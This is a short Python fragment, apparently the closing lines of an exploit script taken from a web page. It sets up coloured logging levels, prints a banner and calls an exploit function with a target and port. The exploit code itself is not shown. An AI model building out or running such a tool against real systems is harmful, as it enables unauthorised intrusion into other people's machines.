logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.target, args.port) </code></pre>